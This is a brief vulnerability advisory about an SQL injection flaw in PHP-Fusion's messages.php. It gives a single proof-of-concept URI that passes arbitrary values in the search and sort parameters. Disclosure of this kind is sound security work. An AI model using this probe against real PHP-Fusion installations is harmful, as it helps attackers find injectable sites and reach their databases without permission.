PHP-Fusion Messages.PHP SQL Injection Vulnerability

PHP-Fusion Messages.PHP SQL Injection Vulnerability

No exploit is required.

The following proof of concept URI is available:
http://www.example.com/messages.php?folder=inbox&srch_text=a&srch_type=blehblahbleh&sort_type=blahblehblah&srch_submit=Search%20/%20Sort